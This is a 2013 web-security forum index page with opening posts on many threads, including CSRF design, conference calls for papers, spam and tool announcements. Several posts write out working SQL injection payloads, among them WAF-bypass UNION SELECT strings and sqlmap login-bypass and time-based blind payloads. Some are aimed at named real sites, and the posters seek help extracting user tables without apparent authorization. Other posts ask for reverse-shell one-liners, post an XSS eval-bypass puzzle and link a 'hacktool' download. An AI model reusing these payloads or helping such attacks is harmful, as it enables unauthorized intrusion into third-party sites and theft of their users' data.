Web Application Security Forum

APP for pranking mobile phones - Mobile Prank 2 Hacktool (no replies)

tribalmp — Thu, 16 May 2013 12:43:13 -0500

APP for pranking mobile phones - Mobile Prank 2 Hacktool

Download: http://www.multiupload.nl/ST4VPWPOUZ
Pass: protected

CSRF prevention - AJAX, CORS (3 replies)

ethicalhack3r — Fri, 17 May 2013 15:28:28 -0500

Hi,

In this scenario the client and server are on different domains. The client uses AJAX to communicate with the server's API with the use of CORS.

My initial idea was this:

1. client sends request to server for token (give me a token!)
2. server checks origin (do we trust the client?)
3. replies with token if origin is trusted (yea, ok, send him a token)
4. client sends *real* (user initiated) request with token (add a user and here is my token)
5. server checks token and origin (is the token valid? is the client trusted?)

However, it seems to add no protection for CSRF if the origin header was removed. However, if we remove the token from the above and only rely on the origin header, this has been known to have issues too (https://docs.djangoproject.com/en/1.2/releases/1.2.5/#csrf-exception-for-ajax-requests).

How would you prevent CSRF in this situation?

Thanks,
Ryan

Game developers getting consulting from Kapersky for more realism in game. (2 replies)

Kyran — Sat, 18 May 2013 01:13:09 -0500

http://www.pcgamer.com/2013/05/14/watch-dogs-developers-consult-with-internet-security-firm-for-more-realistic-hacking/

I don't know how much cross-over there is for the sla.ckers and gaming, but I thought this was really cool.

Any of you consultants lurking?

Bypass ASP null byte (no replies)

m1cr0n — Mon, 13 May 2013 11:37:02 -0500

ANyone has idea to bypass asp with null byte on this link: http://bit.ly/17lNtvV

Thanks.

XCon 2013 XFocus Information Security Conference Call for Paper (no replies)

xcon2009 — Sun, 05 May 2013 22:19:13 -0500

XCon 2013 XFocus Information Security Conference Call for Paper

August, 22th–23th , 2013, Beijing, China (http://xcon.xfocus.net)

Upholding rigorous work style, XCon sincerely welcomes contributions from information security technique enthusiasts and expects your participation and sharing.

Attenders:
Anyone who loves information security, including information security experts and fans,network administrators, network security consultants, CIO, hacker technique fans.

Location : Beijing Jin Tai Hotel ( http://www.bjjintaihotel.com )

Topics Range (but unlimited):
--- Windows 8 defensive technologies
- New Bugs digging
- New offensive technologies
- SNS Application
- Mobile Handset (IPhone / Android)
- Web 2.0 security technologies

---Special Network and Devices Security
- RFID
- Transportation Control and Management Networks

--- Application security
- Routing device
- Encryption & decryption technique
- Protocol security & exploitation
- Web application vulnerability research
- Application reverse engineering and related automated tools
- Database security & attacks
- Advanced Trojans, worms and backdoor technique

--- Intrusion detection/forensics analysis
- Traffic analysis
- Real-time data structure recovery
- File system analysis & recovery
- Intrusion detection and anti-detection technique
- Reverse engineering (malicious code analysis technique,vulnerability research)

--- Wireless & VoIP security
- Wireless gateway
- PDA & mobile protocol analysis
- WLANs hardening & vulnerability analysis
- VoIP security & vulnerability analysis
- 802.11x, CDPD, Bluetooth, WAP/TD-SCDMA, GSM, SMS

--- P2P technique
- Instant messenger (QQ,MSN, Skype, ICQ, etc.)
- P2P application (BT, Emule, Thunder, etc.)

--- Any topics that will catch the attention of the CFP committee and/or the world.

Paper Submission:
The papers need include information as follow:
1) Brief introduction to the topic and whether the topic had been publicized, and if so, the publicized range.
2) Introduction to yourself.
3) Contact information: full name, alias, nationality, network nickname, e-mail,tel,fax,current working place and company, IM (QQ,MSN, ICQ,YM, AIM or others).
4) Presentation details:
- How long is the presentation
- If any new tool/vulnerability/Exploit code will be released
5) The paper need include both PPT (for presentation) and WORD (for detailed description) in MS Office or OpenOffice format.

All the papers will be submitted to xcon@huayongxingan.com for preliminary selection.
The deadline for submission is on July,20th,2013, and the deadline for confirmation is on August,1st,2013.
No matter if the paper is accepted, we will officially inform you within 7 work days.

Important dates:
* Deadline for submission: July,20th, 2013
* Deadline for confirmation: August,1st,2013

Speakers' privilege:
If your paper is accepted by XCon, you will be invited to give an individual lecture in XCon.
The speakers will be provided with:
- Round-trip plane ticket (Economy class, one person only, Foreign speakers up to$1,400.)
- Two days' food and accommodation
- Invitation to celebration party
- Sightseeing some famous places of interests in Beijing, tasting Chinese flavored food
- Luck draw

PS:
- Speakers must provide corresponding invoice or credential.
- XCon owns the right of final explanation about the conference.

For more information about the conference, please contact xcon@xfocus.org,xcon@huayongxingan.com or professional XCon2012 organizer. MSN: xcon@xfocus.org; tel: 086-010-62029792

Application for Attending:
In order to attend the conference, please register at XCon website (http://xcon.xfocus.org) or directly contact the organizer mentioned above.
We will offer different discounts according to the time of application.
Attenders' food and accommodation will be covered by themselves, and XCon will provide restaurant reservation and other service.

Other information :
All the information about XCon will be released on XCon and Xfocus website.
Please visit http://xcon.xfocus.org/ for more information about speakers, agenda and previous XCon documents.

Thank you for your support to XCon.

Security In Authentication for Web Applications (no replies)

Endowd — Sun, 05 May 2013 17:17:10 -0500

Hi guys, please i need some assistance in this area. Im doing my Masters and Im researching on this topic above. Iv done some reviews but cant really come up with concrete weaknesses on the related works. Any assistance in terms of what to do differently or enhance the security will be highly appreciated. Thanks

i can get data, plz help with this waf !!!!! (7 replies)

versus — Mon, 06 May 2013 20:02:12 -0500

hi after many test and check im blocked here :

www.site.com/?id=info_details&ida=-2 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(table_name)),4,5,6,7,8,9+from /*!information_schema*/.tables limit 10,1--

i can get "user" , all okayyy :

now with this :

www.site.com/?id=info_details&ida=-2 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(column_name)),4,5,6,7,8,9+from /*!information_schema*/.columns where table_name='users'--

im also do this :

.......table_name=CHAR(117, 115, 101, 114, 115)--

but i get nothing i can't extract data , what's my mistak,

no error and no data :(

tell me what's wrong plz, thnk's ,and for all your replay for my previos topic (thanggiangho, hack2012 ,ajkaro... ) it's help than ky u very much :)

Recruitment Firm in Delhi Ncr (no replies)

rajeshdelhi — Tue, 30 Apr 2013 01:29:23 -0500

New Delhi
http://kaiznhr.com
job consultant in Delhi ncr - job consultant in India - Recruitment firm in Delhi ncr Recruitment firm in India - hr consultant in Delhi Ncr - hr consultant in India - recruitment agency in Delhi - Placement consultant in Delhi Ncr

Kaiznhr is a leading consultant in delhi NCR with main focus on providing high quality HR services to the clients. The focused approach, continuous improvement to enhance operational and delivery standards, implementation of best practices and technology has helped Matrix HR in attaining the leading position in the HR Services. We currently employs more than 700 employees in leading MNCs, Corporate Houses, FMCG, Service Industries, KPO, Technologies, Engineering & Manufacturing Companies.
We see HR as a crucial part of any successful business. We believe that people are the single most important asset of any organisation and the role they play both internally and externally is extremely pivotal to the organisation’s success. Kaizn HR acts as a gateway to offer top of the line executive recruitment and selection services to companies.
Central to our approach is the development of close and long term relationships with our clients. Our range of services includes consultation, executive search & selection, executive training, performance management etc. We recruit across various industry segments for multinational corporates as well as for leading and emerging business houses. We have consultants who can quickly understand your business and provide cost-effective yet efficient solutions.

Why Kaizn HR
(1) We provide the best staffing solutions ensuring quality, integrity and expertise.
(2) We are a talent-rich company.
(3) We enjoy the confidence of leading corporations.
(4) We offer multiple advantages.
(5) We have state of the art technologies for total solutions.
(6) Major costs savings in accounting & overhead work.
(7) Trained, highly qualified staff readily available at short notices.
(8) Turn around time is very short depending upon the project.
(9) Cost effective Staffing Solutions.

We deliver customized staffing solutions that make it easier for our clients to achieve their goals at a great value proposition with innovative technology, customized staffing solutions.
We have a broad range of Staffing solutions that help employers to increase their productivity, ensure legal compliance, improve employee retention and minimize the recruitment cost. Our in-house recruitment team and network of recruiters across the country ensure that we meet your staffing requirements on a long term basis.

About the author
Managing Director
Kaizn HR

http://kaiznhr.com/post_your_manpower.php

Greeting (2 replies)

sandeepk.l337 — Mon, 13 May 2013 19:18:08 -0500

Hey , I am sandeep. Right place to share Info Sec Experience :)

a wierd Sql Injection (no replies)

Desperado — Fri, 26 Apr 2013 04:02:55 -0500

Injection:http://store.yam.com/store/index.php?action=store_product_sort&prod_sort_uid=400')%20and%201=2

This Injection can't be connected in sqlmap y others inject tools, these tools show me Host No Found. i've used the normal method like order by xx, it doesn't work here,and the this injection don't expose the mysql_error.

I think the sql is select * from xx where id in('xx'), any Helps??

waf or somthing wrong !!!! (2 replies)

versus — Tue, 30 Apr 2013 07:22:59 -0500

hi, and thnk's for this great forum :

i have probleme like that :

www.vuln.org?id=1'
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource

ok

www.vuln.org?id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,3,4,5,6,7,8,9--

3 and 4

id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,version(),4,5,6,7,8,9--

5.5.23-55

ok

this is problem WAF block me here !!!!!!!

id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!group_concat*/(table_name),4,5,6,7,8,9 from /*!information_schema*/.tables where table_schema=database()--

i have this :

Forbidden

You don't have permission to access / on this server.

so with this

www.vuln.org?id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!table_name*/,4,5,5,6,7,8,9 /*!from*/ /*!InfoRmation_SCHEMa*/.`tables`--

i have :

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource

plz tell me other option to bypass this waf, thnk's.

how to bypass this WAF can u help plz (4 replies)

versus — Thu, 18 Apr 2013 12:01:08 -0500

this vuln url :
http://www.cobra.com.dz/produits_cat_detail.php?id=325'

Une erreur est survenue 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'325 AND actif=1' at line 1 Veuillez contacter votre administrateur

with sqlamp commnade check-waf : it's protected, no way to get databases how to bypass it ? plz

reverse shells (no replies)

Anarchy Angel — Mon, 15 Apr 2013 21:31:33 -0500

there used to be a thread here somewhere that gave lots of good one liners and such for opening bind and reverse shells but i cant find it. would anyone happen to have it as a favorite or something? :D thanx

The Art of Exploiting Injection Flaws (no replies)

notsosecure — Mon, 15 Apr 2013 07:58:06 -0500

The popular course on Injection Flaws will return to Las Vegas at Black hat 2013.

More details can be found here:

https://www.blackhat.com/us-13/training/the-art-of-exploiting-injection-flaws.html

Some of the new additions to the course are:

Oracle SQLI- how to execute OS code, how to do priv esc from web app, OOB
extraction. Examples of burp pro missing SQLI. Injection in order by/group by, 2nd order injection etc.

XPath: We will show a new attack with which you can not just read any arbitrary XML file on system but any file with any extension.
LDAP- some really good example of auth bypass and blind ldap tool.
XXE- not too new stuff but good pointer on where to look for these.
Direct code injection- examples of recent ruby on rail and other framework issues such as expression query language injection etc.

Cheers
Sid

Did you know? (3 replies)

Kyran — Thu, 18 Apr 2013 01:36:56 -0500

About 9 out of every 10 people, make up 90% of the population?

Panoptic (no replies)

lightos — Mon, 08 Apr 2013 18:27:07 -0500

Hello everyone, I want to share a tool I wrote in Python with Miroslav Stampar which can be useful when dealing with LFI type vulnerabilities. Here's the description from the Github repository:

"Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through LFI vulnerability. Official introductionary post can be found here. Also, you can find a sample run here."

Hope you guys like it!

[SqlMap] How to Exploit Sqlia AND/OR time-based blind? (no replies)

Nerder — Mon, 25 Mar 2013 09:04:43 -0500

Hello everybody,

I found 2 different SQLIA in a website.
The Sqlia is POST method type and affected the login form.
The first one is:

Type:boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: account=-4241' OR (1251=1251)#&password=test

This one is pretty simple query, but return something strange, cause if i try for example to login with a specific accont and bypass the login looks like impossibile for me, cause with this query i grant the access of the last user register on the DB. I need some help for structure the query much better and bypass the login with all the user that i want.

The second one is:

Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: account=test' AND 1939=BENCHMARK(5000000,MD5(0x7463556e)) AND 'kpiJ'='kpiJ&password=test

This one works good, but not good enough, cause is pretty slow and sometimes sqlmap lost somechar.
With this one i was able to get some good information from the DB like (DBS, TABLES) but right now i need to get the COLUMNS, and after that the DATA, and i need something faster and clear.

Someone can help me to structure the best command line for setting up in the best way sqlmap for my needs?

Thx in advance.

(Dont ask me for the Link cause i cant share or provide in pvt as well)

PHP & Curl Help (no replies)

RonPaul — Thu, 21 Mar 2013 15:47:40 -0500

Please message me if you can help me with a php script i am writing that has a lot of curl.

Social Network Information Harvesting (SNIH) (no replies)

xc0r3 — Thu, 21 Mar 2013 04:12:22 -0500

Social Networks have a wealth of information to collect ! :) Check this out !

http://xc0re.net/web/social-network-information-harvesting-snih/

mysql_ depreciated, use mysqli or pdo. lol. (no replies)

SAS — Sat, 09 Mar 2013 06:21:34 -0600

PHP is working for a couple of years to ditch mysql_ extension from PHP. See this post: http://news.php.net/php.internals/53799

So if you are like me and have created hundreds of thousands of lines of code in the 'ol mysql_ extention, you might want to rewrite all that stuff before PHP6 comes out. Clever move, PHP. The object orientated folks know it all!

They think that using mysqli or pdo will solve everything. No more hacking, right? Now the scripter can sit back and relax... or can they? lol.

Nice PDO exploit: http://www.securityfocus.com/bid/54777/info

-

Content length without actually reading content (no replies)

firestorm — Thu, 28 Feb 2013 08:38:01 -0600

I noticed that when I make request using gzip encoding the server response has content-length set for me, so I get to know the size without actually having the need to read entire response. Is there any other encoding type for which the server sets content-length in response header ?

Thanks!

XSS in hidden Field (no replies)

kamal — Tue, 26 Feb 2013 13:48:29 -0600

Hi,

is it possible to have an exploit here?

INPUT is user input
<,>,(,) are encoded

I know we can exploit using style tag.. but the problem is I can't use (,) symbols... so is there anyway to bypass it.

regards

SXSW (no replies)

id — Sun, 17 Feb 2013 12:31:09 -0600

Anyone coming out to Austin next month for SXSW?

.BlowBrain CryptoGame (no replies)

Nerder — Mon, 11 Feb 2013 19:11:59 -0600

Welcome to .Blowbrain,

this is a simple game of logic, encryption and hacking, which will be used to measure
your skills in this specific fields. On the homepage you can get your own encrypted code.
Your task is to decrypt this code, overcoming the difficulties you will find in your path.
When you will find the solution, just click on the brain and use the form to send us the
random number that you'll get.
We will contact you to be sure that you won our game. The Winner will be rewarded.
The entire project has been conceived, designed, programmed and developed in one night,
between London, Milan and Rome.

Blow your brain.

http://blowbrain.clicklife.it

XSS Challenge (no replies)

lucasnn — Fri, 08 Feb 2013 00:46:12 -0600

Hey folks,

I am new here. Is nice to meet you guys.

I am with a challenge, but I could not solve it. I need bypass a regex to execute javascript inside eval.

The code is:

function json(a){
if (/^\s*$/.test(a) ? 0 : /^[\],:{}\s\u2028\u2029]*$/
.test(a.replace(/\\["\\\/bfnrtu]/g, "@")
.replace(/"[^"\\\n\r\u2028\u2029\x00-\x08\x0a-\x1f]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, "]")
.replace(/(?:^|:|,)(?:[\s\u2028\u2029]*\[)+/g, "")))

try{
return eval("(" + a + ")")
} catch (b) {}
g(Error("Invalid JSON string: " + a))
}
//...
json(window.name);

This ("true);alert(9);//" is very close to a valid javascript statement and will bypass this regex, but still is invalid. The problem? The quote. =(

Any ideas?

[Perl] WebApp, How can i exploit? (3 replies)

Nerder — Sun, 10 Feb 2013 08:24:43 -0600

Hello everyone,
Is couple of days that i try to exploit this webapplication, coded in perl.

Someone already try to do something similar?
I hope in a fast help.
Thx in advance.

This one is a simple dork, many website use this application and everyone have the same vulnz:

http://goo.gl/cgnXG

this is the error that i found:

http://imgur.com/19kk2Q5

*Edit: correct some error.

Cross Site Scripting Tunneling (no replies)

Sr.Gr33n — Sun, 27 Jan 2013 11:44:16 -0600

I haven't found anything about this kind of attacks in the forum so I wan't to post some information abaut XSS Tunneling.

~> What's a XSS tunnel?

Ok, XSST is a HTTP connection that you can stablish with a victim trhow a XSS usually attack.

~> What offers this attack?

This kind of attacks offers you a shell based on JS and allows you to execute some commands in victim's PC but the best of it is that you can configure victim's browser so as to reconnect whit your machine every time it starts.

More info ~~~> labs[dot]portcullis[dot]co[dot]uk/application/xss-tunnelling/

There is a paper in the web very easy so as to understand it.

Gr33tings!

SQLi problems. (4 replies)

Sr.Gr33n — Mon, 11 Mar 2013 11:29:04 -0500

Hi everybody, I'm having seriusly problems so as to make an SQLi.
I'm versus MYSQL 4.0.2 so it's a blind SQLi... and I'm trying to know table names..

1 and (/*!50000 Select*/ 1) = 1--

seems to be functional but i have tried

1 and (/*!50000 Select count(*) from*/ COLLATION) = 1 --

and I can't see the webpage... and It's strange because COLLATION is a table that ever exists... so I don't know where the problem is.

Gr33tings!

PD. I'm new in SQLi any guide is accepted.

security plan automation (like RSAM) (1 reply)

toolbox — Sat, 26 Jan 2013 16:50:31 -0600

Hello posters,

We use RSAM (http://www.rsam.com/) to do move security plans through workflow, providing stats, and sending email notifcations. Does anyone know of similar products that could be used for this? We only need a web interface, workflow, automatic email alerts and ldap integration.

Sensitive info with dhcpcd (3 replies)

fallencity — Thu, 31 Jan 2013 08:53:40 -0600

Hey guys first post here. I was analyzing some packets in wireshark a few days ago. Curious, I set the filter to bootp and took a good look at some DHCP packets. I noticed something that is a clear anonymity leak. In the packet I could see that I was transmitting not only my MAC address as seems to be the norm, I was also transmitting my dhcpcd version, kernel version, OS, and hostname. Which is way too much info for my comfort. I was wondering if there is a way to avoid transmitting this information. No other packets seem to transmit much except for my MAC address which I'm not worried about. But when I issue a DHCP request all of that is transmitted. I remember reading somewhere that you could edit your /etc/init.d/net.eth0 (or equivalent) file to include

VID=`fortune -o|head -c 30|tr "\"'\n" ' ' 2>/dev/null`
/sbin/dhcpcd -i ${VID} ${dhcpcd_IFACE} ${IFACE}

But I'm not sure what the equivalent would be, and I don't have that particular file. I'm using systemd. Any help would be amazing I've been searching this problem for quite some time.